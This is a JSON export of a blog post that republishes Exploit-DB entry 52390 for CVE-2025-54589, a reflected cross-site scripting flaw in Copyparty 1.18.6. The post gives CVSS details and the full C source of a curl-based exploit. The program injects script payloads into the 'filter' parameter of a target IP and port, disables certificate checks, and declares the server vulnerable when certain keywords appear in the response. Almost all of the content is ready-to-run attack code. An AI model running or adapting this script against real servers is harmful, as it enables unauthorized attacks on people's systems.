{"id":9611,"date":"2025-08-03T01:52:30","date_gmt":"2025-08-03T01:52:30","guid":{"rendered":"http:\/\/localhost\/?p=9611"},"modified":"2025-08-03T01:52:30","modified_gmt":"2025-08-03T01:52:30","slug":"copyparty-1186-reflected-cross-site-scripting-xss","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=9611","title":{"rendered":"Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52390<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-08-03T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-08-03T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">6.3<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #ffaa00; font-weight: bold;\">MEDIUM<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:L\/I:L\/A:L<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<li>CVE-2025-54589<\/li>\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\n\/  * Author       : Byte Reaper  * CVE          : CVE-2025-54589  * Title : Copyparty 1.18.6 &#8211; Reflected&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n\/*<br \/>\n<br \/> * Author       : Byte Reaper<br \/>\n<br \/> * CVE          : CVE-2025-54589<br \/>\n<br \/> * Title : Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS)<br \/>\n<br \/> * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (\u2264 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization,<br \/>\n<br \/>  allowing an attacker to inject and execute arbitrary JavaScript in a victim\u2019s browser<br \/>\n<br \/>*\/<\/p>\n<p>#include <curl\/urlapi.h><br \/>\n<br \/>#include <netinet\/in.h><br \/>\n<br \/>#include <stdio.h><br \/>\n<br \/>#include <string.h><br \/>\n<br \/>#include <curl\/curl.h><br \/>\n<br \/>#include &#8220;argparse.h&#8221;<br \/>\n<br \/>#include <stdlib.h><br \/>\n<br \/>#include <arpa\/inet.h><br \/>\n<br \/>#include <stdarg.h><br \/>\n<br \/>#include <unistd.h><\/p>\n<p>#define FULL_URL 2500<br \/>\n<br \/>#define COLOR_RESET &#8220;\\e[0m&#8221;<br \/>\n<br \/>#define COLOR_RED   &#8220;\\e[1;31m&#8221;<br \/>\n<br \/>#define COLOR_GRN   &#8220;\\e[1;32m&#8221;<br \/>\n<br \/>#define COLOR_YEL   &#8220;\\e[1;33m&#8221;<br \/>\n<br \/>#define COLOR_BLU   &#8220;\\e[1;34m&#8221;<br \/>\n<br \/>#define COLOR_CYN   &#8220;\\e[1;36m&#8221;<br \/>\n<br \/>#define COLOR_WHT   &#8220;\\e[1;37m&#8221;<br \/>\n<br \/>#define COLOR_PUR   &#8220;\\e[1;35m&#8221;<br \/>\n<br \/>#define PRINT_OK(fmt, &#8230;)    print_color(COLOR_GRN, &#8220;&#8221; fmt, ##__VA_ARGS__)<br \/>\n<br \/>#define PRINT_ERR(fmt, &#8230;)   print_color(COLOR_RED, &#8220;&#8221; fmt, ##__VA_ARGS__)<br \/>\n<br \/>#define PRINT_WARN(fmt, &#8230;)  print_color(COLOR_YEL, &#8220;&#8221; fmt, ##__VA_ARGS__)<br \/>\n<br \/>#define PRINT_INFO(fmt, &#8230;)  print_color(COLOR_BLU, &#8220;&#8221; fmt, ##__VA_ARGS__)<br \/>\n<br \/>#define PRINT_NOTE(fmt, &#8230;)  print_color(COLOR_CYN, &#8220;&#8221; fmt, ##__VA_ARGS__)<\/p>\n<p>int verbose = 0;<br \/>\n<br \/>int useC = 0;<br \/>\n<br \/>const char *ipT = NULL;<br \/>\n<br \/>int  portT = 0;<br \/>\n<br \/>const char *cookies = NULL;<br \/>\n<br \/>const char *caFile = NULL;<br \/>\n<br \/>int sCa = 0;<br \/>\n<br \/>int useColor = 1;<br \/>\n<br \/>int useHttp = 0;<br \/>\n<br \/>void print_color(const char *color, const char *fmt, &#8230;)<br \/>\n<br \/>{<br \/>\n<br \/>    va_list args;<br \/>\n<br \/>    va_start(args, fmt);<br \/>\n<br \/>    if (useColor)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;%s&#8221;, color);<br \/>\n<br \/>    }<\/p>\n<p>    vprintf(fmt, args);<br \/>\n<br \/>    if (useColor)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;%s&#8221;, COLOR_RESET);<br \/>\n<br \/>    }<\/p>\n<p>    va_end(args);<br \/>\n<br \/>}<br \/>\n<br \/>void exitAssembly()<br \/>\n<br \/>{<br \/>\n<br \/>    __asm__ volatile<br \/>\n<br \/>    (<br \/>\n<br \/>        &#8220;xor %%rdi, %%rdi\\n\\t&#8221;<br \/>\n<br \/>        &#8220;mov $231, %%rax\\n\\t&#8221;<br \/>\n<br \/>        &#8220;syscall\\n\\t&#8221;<br \/>\n<br \/>        :<br \/>\n<br \/>        :<br \/>\n<br \/>        : &#8220;rax&#8221;,<br \/>\n<br \/>          &#8220;rdi&#8221;<br \/>\n<br \/>    );<br \/>\n<br \/>}<br \/>\n<br \/>struct Mem<br \/>\n<br \/>{<br \/>\n<br \/>    char *buffer;<br \/>\n<br \/>    size_t len;<br \/>\n<br \/>};<br \/>\n<br \/>size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)<br \/>\n<br \/>{<br \/>\n<br \/>    size_t total = size * nmemb;<br \/>\n<br \/>    struct Mem *m = (struct Mem *)userdata;<br \/>\n<br \/>    char *tmp = realloc(m->buffer, m->len + total + 1);<br \/>\n<br \/>    if (tmp == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        PRINT_ERR(&#8220;[-] Failed to allocate memory!\\n&#8221;);<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    }<br \/>\n<br \/>    m->buffer = tmp;<br \/>\n<br \/>    memcpy(&#038;(m->buffer[m->len]), ptr, total);<br \/>\n<br \/>    m->len += total;<br \/>\n<br \/>    m->buffer[m->len] = &#8216;\\0&#8217;;<br \/>\n<br \/>    return total;<br \/>\n<br \/>}<br \/>\n<br \/>const char *payloadXss[] =<br \/>\n<br \/>{<\/p>\n<p>    &#8220;<\/script><script>alert(1)<\/script>&#8220;,<br \/>\n<br \/>    &#8220;<script\\x09type=\\\"text\/javascript\\\">javascript:alert(XSS);<\/script>&#8220;,<br \/>\n<br \/>    &#8220;<script\\x0Ctype=\\\"text\/javascript\\\">javascript:alert(byte);<\/script>&#8221;<br \/>\n<br \/>};<br \/>\n<br \/>int number = sizeof(payloadXss) \/ sizeof(payloadXss[0]);<br \/>\n<br \/>const char *wordF[] =<br \/>\n<br \/>{<br \/>\n<br \/>    &#8220;Error&#8221;,<br \/>\n<br \/>    &#8220;Exception&#8221;,<br \/>\n<br \/>    &#8220;Invalid&#8221;,<br \/>\n<br \/>    &#8220;XSS&#8221;,<br \/>\n<br \/>    &#8220;<script>\",\n<br \/>    \"<\/script>&#8220;,<br \/>\n<br \/>    &#8220;alert(1)&#8221;,<br \/>\n<br \/>    &#8220;syntax&#8221;,<br \/>\n<br \/>    &#8220;unexpected&#8221;,<br \/>\n<br \/>    &#8220;undefined&#8221;,<br \/>\n<br \/>    &#8220;NaN&#8221;,<br \/>\n<br \/>    &#8220;stack trace&#8221;,<br \/>\n<br \/>    &#8220;TypeError&#8221;,<br \/>\n<br \/>    &#8220;ReferenceError&#8221;,<br \/>\n<br \/>    &#8220;Warning&#8221;,<br \/>\n<br \/>    &#8220;Access denied&#8221;,<br \/>\n<br \/>    &#8220;eval(&#8220;,<br \/>\n<br \/>    &#8220;byte&#8221;,<br \/>\n<br \/>};<br \/>\n<br \/>int numberW = sizeof(wordF) \/ sizeof(wordF[0]);<\/p>\n<p>void auto_detect_color()<br \/>\n<br \/>{<br \/>\n<br \/>    if (!isatty(fileno(stdout)))<br \/>\n<br \/>    {<br \/>\n<br \/>        useColor = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>}<br \/>\n<br \/>void senR(const char *ip, int port)<br \/>\n<br \/>{<br \/>\n<br \/>    char full[FULL_URL];<br \/>\n<br \/>    CURLcode res ;<br \/>\n<br \/>    CURL *curl = curl_easy_init();<br \/>\n<br \/>    struct  Mem response ;<br \/>\n<br \/>    response.buffer= NULL;<br \/>\n<br \/>    response.len = 0;<br \/>\n<br \/>    for (int h = 0; h < number ; h++)\n<br \/>    {<br \/>\n<br \/>        if (!curl)<br \/>\n<br \/>        {<br \/>\n<br \/>            PRINT_ERR(&#8220;[-] Error Create Object Curl !\\n&#8221;);<br \/>\n<br \/>            PRINT_ERR(&#8220;[-] Check Your Connection\\n&#8221;);<br \/>\n<br \/>            exitAssembly();<\/p>\n<p>        }<br \/>\n<br \/>        if (verbose)<br \/>\n<br \/>        {<br \/>\n<br \/>            PRINT_OK(&#8220;==========================================\\n&#8221;);<br \/>\n<br \/>            PRINT_OK(&#8220;[1;33m[+] Cleaning Response&#8230;\\n&#8221;);<br \/>\n<br \/>            PRINT_OK(&#8220;[1;33m[+] Response Buffer : NULL\\n&#8221;);<br \/>\n<br \/>            PRINT_OK(&#8220;[1;33m[+] Response Len : 0\\n&#8221;);<br \/>\n<br \/>            PRINT_OK(&#8220;==========================================\\n&#8221;);<br \/>\n<br \/>        }<br \/>\n<br \/>        if (curl)<br \/>\n<br \/>        {<\/p>\n<p>            char *payloadE = curl_easy_escape(curl,<br \/>\n<br \/>                payloadXss[h],<br \/>\n<br \/>                0);<br \/>\n<br \/>            struct curl_slist *headers = NULL;<br \/>\n<br \/>            if (!payloadE)<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_ERR(&#8220;[-] Error Encode Payload !\\e[0m\\n&#8221;);<br \/>\n<br \/>                curl_slist_free_all(headers);<br \/>\n<br \/>                curl_easy_cleanup(curl);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<\/p>\n<p>            const char *proto = useHttp ? &#8220;http&#8221; : &#8220;https&#8221;;<br \/>\n<br \/>            int len1 = snprintf(full, sizeof(full), &#8220;%s:\/\/%s:%d\/?filter=%s&#8221;, proto, ip, port, payloadE);<br \/>\n<br \/>            if (len1 >= sizeof(full))<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_ERR(&#8220;[-] URL too long\\n&#8221;);<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<br \/>\n<br \/>            PRINT_INFO(&#8220;[+] Encode Payload : %s\\n&#8221;, payloadXss[h]);<br \/>\n<br \/>            PRINT_INFO(&#8220;[+] Encode Payload Successfully.\\n&#8221;);<br \/>\n<br \/>            PRINT_INFO(&#8220;[+] Payload Encode : %s\\n&#8221;, payloadE);<br \/>\n<br \/>            PRINT_INFO(&#8220;[+] target IP : %s\\n&#8221;,<br \/>\n<br \/>                ip);<br \/>\n<br \/>            printf(&#8220;[+] Full Url : %s\\n&#8221;,<br \/>\n<br \/>                full);<br \/>\n<br \/>            printf(&#8220;[+] Port : %d\\n&#8221;, port);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                CURLOPT_URL,<br \/>\n<br \/>                full);<br \/>\n<br \/>            curl_free(payloadE);<br \/>\n<br \/>            if (useC)<br \/>\n<br \/>            {<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEFILE,<br \/>\n<br \/>                                    cookies);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                 CURLOPT_COOKIEJAR,<br \/>\n<br \/>                                 cookies);<br \/>\n<br \/>            }<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                CURLOPT_FOLLOWLOCATION,<br \/>\n<br \/>                1L);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                            CURLOPT_WRITEFUNCTION,<br \/>\n<br \/>                            write_cb);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                            CURLOPT_WRITEDATA,<br \/>\n<br \/>                                &#038;response);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                            CURLOPT_CONNECTTIMEOUT,<br \/>\n<br \/>                            5L);<br \/>\n<br \/>            usleep(1500000);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                        CURLOPT_TIMEOUT,<br \/>\n<br \/>                                10L);<br \/>\n<br \/>            if (sCa)<br \/>\n<br \/>            {<br \/>\n<br \/>                curl_easy_setopt(curl, CURLOPT_CAINFO, caFile);<br \/>\n<br \/>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                    CURLOPT_SSL_VERIFYPEER,<br \/>\n<br \/>                    0L);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                CURLOPT_SSL_VERIFYHOST,<br \/>\n<br \/>                                0L);<br \/>\n<br \/>            }<\/p>\n<p>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                    &#8220;Accept-Language: en-US,en&#8221;);<br \/>\n<br \/>            headers = curl_slist_append(headers,<br \/>\n<br \/>                                        &#8220;Connection: keep-alive&#8221;);<br \/>\n<br \/>            char refR[120];<br \/>\n<br \/>            int lenF  = snprintf(refR,<br \/>\n<br \/>                sizeof(refR),<br \/>\n<br \/>                &#8220;Referer: http:\/\/%s:%d&#8221;,<br \/>\n<br \/>                ip,<br \/>\n<br \/>                port);<br \/>\n<br \/>            if (lenF < 0 || (size_t)lenF >= sizeof(refR))<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_ERR(&#8220;[-] Len Header Referer is Long ! \\n&#8221;);<br \/>\n<br \/>                response.buffer = NULL;<br \/>\n<br \/>                response.len = 0;<br \/>\n<br \/>                curl_slist_free_all(headers);<br \/>\n<br \/>                curl_easy_cleanup(curl);<br \/>\n<br \/>                exitAssembly();<\/p>\n<p>            }<br \/>\n<br \/>            headers = curl_slist_append(headers, refR);<br \/>\n<br \/>            curl_easy_setopt(curl,<br \/>\n<br \/>                 CURLOPT_HTTPHEADER,<br \/>\n<br \/>                 headers);<br \/>\n<br \/>            if (verbose)<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_OK(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[Verbose Curl]&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n&#8221;);<br \/>\n<br \/>                curl_easy_setopt(curl,<br \/>\n<br \/>                                CURLOPT_VERBOSE,<br \/>\n<br \/>                                1L);<br \/>\n<br \/>            }<br \/>\n<br \/>            res = curl_easy_perform(curl);<br \/>\n<br \/>            curl_slist_free_all(headers);<br \/>\n<br \/>            if (res == CURLE_OK)<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_OK(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;\\n&#8221;);<br \/>\n<br \/>                long httpCode  = 0;<br \/>\n<br \/>                curl_easy_getinfo(curl,<br \/>\n<br \/>                                CURLINFO_RESPONSE_CODE,<br \/>\n<br \/>                                 &#038;httpCode);<br \/>\n<br \/>                PRINT_INFO(&#8220;[+] Request sent successfully\\e[0m\\n&#8221;);<br \/>\n<br \/>                PRINT_OK(&#8220;[+] Http Code -> %ld\\e[0m\\n&#8221;, httpCode);<br \/>\n<br \/>                FILE *log = fopen(&#8220;results.txt&#8221;, &#8220;a&#8221;);<br \/>\n<br \/>                if (log == NULL)<br \/>\n<br \/>                {<br \/>\n<br \/>                    PRINT_ERR(&#8220;[-] Error Create File !\\n&#8221;);<br \/>\n<br \/>                    exitAssembly();<br \/>\n<br \/>                }<br \/>\n<br \/>                if (log)<br \/>\n<br \/>                {<br \/>\n<br \/>                    fprintf(log, &#8220;[+] Target: %s:%d | Payload: %s\\n&#8221;,<br \/>\n<br \/>                             ip,<br \/>\n<br \/>                             port,<br \/>\n<br \/>                              payloadXss[h]);<br \/>\n<br \/>                    fprintf(log, &#8220;[+] Response : \\n%s\\n&#8221;,<br \/>\n<br \/>                            response.buffer);<br \/>\n<br \/>                    fclose(log);<br \/>\n<br \/>                }<br \/>\n<br \/>                if (httpCode >= 200 &#038;&#038; httpCode < 300)\n<br \/>                {<\/p>\n<p>                    PRINT_OK(&#8220;[+] Http Code (200 < 300) : %ld\\n\",httpCode);\n<br \/>                    for (int s = 0; s < numberW ; s++) \n<br \/>                    {<br \/>\n<br \/>                        if (strstr(response.buffer, wordF[s]) != NULL)<br \/>\n<br \/>                        {<br \/>\n<br \/>                            PRINT_INFO(&#8220;[+] A suspicious word was found in the server&#8217;s response !!\\n&#8221;);<br \/>\n<br \/>                            PRINT_INFO(&#8220;[+] Word Found : %s\\n&#8221;, wordF[s]);<br \/>\n<br \/>                            PRINT_NOTE(&#8220;[+] The vulnerability CVE-2025-54589 exists on the server\\n&#8221;);<br \/>\n<br \/>                            PRINT_OK(&#8220;\\n======================================== [Response Server] ========================================\\n&#8221;);<br \/>\n<br \/>                            printf(&#8220;%s\\n&#8221;, response.buffer);<br \/>\n<br \/>                            printf(&#8220;[Len] : %zu\\n&#8221;, response.len);<br \/>\n<br \/>                            PRINT_OK(&#8220;\\n==================================================================================================\\n&#8221;);<\/p>\n<p>                        }<br \/>\n<br \/>                    }   <\/p>\n<p>                }<br \/>\n<br \/>                else<br \/>\n<br \/>                {<br \/>\n<br \/>                    PRINT_ERR(&#8220;[-] HTTP Code Not Range Positive (200 < 300) : %ld\\n\", httpCode);\n<br \/>                    PRINT_ERR(&#8220;[+] Try Next Payload : %s\\e[0m\\n&#8221;, payloadXss[h]);<br \/>\n<br \/>                }<\/p>\n<p>            }<br \/>\n<br \/>            else<br \/>\n<br \/>            {<br \/>\n<br \/>                PRINT_ERR(&#8220;[-] Error Send Request\\n&#8221;);<br \/>\n<br \/>                PRINT_ERR(&#8220;[-] Error : %s\\e[0m\\n&#8221;, curl_easy_strerror(res));<br \/>\n<br \/>                exitAssembly();<br \/>\n<br \/>            }<\/p>\n<p>        }<br \/>\n<br \/>    }<br \/>\n<br \/>    if (response.buffer)<br \/>\n<br \/>    {<br \/>\n<br \/>        free(response.buffer);<br \/>\n<br \/>        response.buffer = NULL;<br \/>\n<br \/>        response.len = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    curl_easy_cleanup(curl);<br \/>\n<br \/>}<\/p>\n<p>int main(int argc,<br \/>\n<br \/>         const char **argv)<br \/>\n<br \/>{<br \/>\n<br \/>    curl_global_init(CURL_GLOBAL_DEFAULT);<\/p>\n<p>    printf(<br \/>\n<br \/>        &#8220;\u2584\u2596\u2596\u2596\u2584\u2596  \u2584\u2596\u2584\u2596\u2584\u2596\u2584\u2596  \u2584\u2596\u2596\u2596\u2584\u2596\u2584\u2596\u2584\u2596\\n&#8221;<br \/>\n<br \/>        &#8220;\u258c \u258c\u258c\u2599\u2596\u2584\u2596\u2584\u258c\u259b\u258c\u2584\u258c\u2599\u2596\u2584\u2596\u2599\u2596\u2599\u258c\u2599\u2596\u2599\u258c\u2599\u258c\\n&#8221;<br \/>\n<br \/>        &#8220;\u2599\u2596\u259a\u2598\u2599\u2596  \u2599\u2596\u2588\u258c\u2599\u2596\u2584\u258c  \u2584\u258c \u258c\u2584\u258c\u2599\u258c\u2584\u258c\\n&#8221;<br \/>\n<br \/>                        &#8220;Byte Reaper\\n&#8221;<br \/>\n<br \/>    );<br \/>\n<br \/>    int noColor = 0;<br \/>\n<br \/>    struct argparse_option options[] =<br \/>\n<br \/>    {<br \/>\n<br \/>        OPT_HELP(),<br \/>\n<br \/>        OPT_STRING(&#8216;i&#8217;,<br \/>\n<br \/>                    &#8220;ip&#8221;,<br \/>\n<br \/>                    &#038;ipT,<br \/>\n<br \/>                    &#8220;Target IP &#8220;),<br \/>\n<br \/>        OPT_STRING(&#8216;c&#8217;,<br \/>\n<br \/>                    &#8220;cookies&#8221;,<br \/>\n<br \/>                    &#038;cookies,<br \/>\n<br \/>                    &#8220;cookies File&#8221;),<br \/>\n<br \/>        OPT_BOOLEAN(&#8216;v&#8217;,<br \/>\n<br \/>                     &#8220;verbose&#8221;,<br \/>\n<br \/>                     &#038;verbose,<br \/>\n<br \/>                     &#8220;Verbose Mode&#8221;),<br \/>\n<br \/>        OPT_INTEGER(&#8216;p&#8217;,<br \/>\n<br \/>            &#8220;port&#8221;,<br \/>\n<br \/>            &#038;portT,<br \/>\n<br \/>            &#8220;Enter Target Port&#8221;),<br \/>\n<br \/>        OPT_STRING(&#8216;a&#8217;,<br \/>\n<br \/>            &#8220;ca&#8221; ,<br \/>\n<br \/>            &#038;caFile,<br \/>\n<br \/>            &#8220;Enter Name File CA\\n&#8221;),<br \/>\n<br \/>        OPT_BOOLEAN(&#8216;t&#8217;, &#8220;http&#8221;, &#038;useHttp, &#8220;HTTP Protocol&#8221;),<br \/>\n<br \/>        OPT_BOOLEAN(&#8216;n&#8217;,<br \/>\n<br \/>             &#8220;no-color&#8221;,<br \/>\n<br \/>             &#038;noColor,<br \/>\n<br \/>             &#8220;Disable colored output&#8221;),<br \/>\n<br \/>        OPT_END(),<br \/>\n<br \/>    };<br \/>\n<br \/>    struct argparse argparse;<br \/>\n<br \/>    argparse_init(&#038;argparse,<br \/>\n<br \/>                options,<br \/>\n<br \/>                NULL,<br \/>\n<br \/>                0);<\/p>\n<p>    argparse_parse(&#038;argparse,<br \/>\n<br \/>                argc,<br \/>\n<br \/>                argv);<br \/>\n<br \/>    if (ipT == NULL)<br \/>\n<br \/>    {<br \/>\n<br \/>        PRINT_ERR(&#8220;[-] Please Enter Target Ip And Port !\\n&#8221;);<br \/>\n<br \/>        PRINT_ERR(&#8220;[-] Ex : .\/exploit -i <IP> -p <PORT>\\n&#8221;);<br \/>\n<br \/>        PRINT_ERR(&#8220;[-] Exit Syscall\\n&#8221;);<br \/>\n<br \/>        curl_global_cleanup();<br \/>\n<br \/>        exitAssembly();<br \/>\n<br \/>    };<br \/>\n<br \/>    printf(&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n\\n&#8221;);<br \/>\n<br \/>    printf(&#8220;[+] Start Exploit XSS (CVE-2025-54589)&#8230;\\n&#8221;);<br \/>\n<br \/>    if (cookies)<br \/>\n<br \/>    {<br \/>\n<br \/>        useC = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (verbose)<br \/>\n<br \/>    {<br \/>\n<br \/>         verbose = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (!portT)<br \/>\n<br \/>    {<br \/>\n<br \/>        printf(&#8220;[+] Default Port : %d\\n&#8221;, 3923);<br \/>\n<br \/>        portT = 3923;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (caFile)<br \/>\n<br \/>    {<br \/>\n<br \/>        sCa = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (useColor)<br \/>\n<br \/>    {<br \/>\n<br \/>        useColor = 1;<br \/>\n<br \/>    }<\/p>\n<p>    if (noColor)<br \/>\n<br \/>    {<\/p>\n<p>        useColor = 0;<br \/>\n<br \/>    }<br \/>\n<br \/>    if (useHttp)<br \/>\n<br \/>    {<br \/>\n<br \/>        useHttp = 1;<br \/>\n<br \/>    }<br \/>\n<br \/>    auto_detect_color();<br \/>\n<br \/>    senR(ipT, portT);<br \/>\n<br \/>    curl_global_cleanup();<br \/>\n<br \/>    return 0;<br \/>\n<br \/> }\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52390\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS) Exploit ID EDB-ID:52390 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,23,12,40,21,13,7,11,5],"class_list":["post-9611","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-63","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=9611\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting (XSS) Exploit ID EDB-ID:52390 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=9611\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-03T01:52:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9611\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Copyparty 1.18.6 &#8211; Reflected Cross-Site Scripting 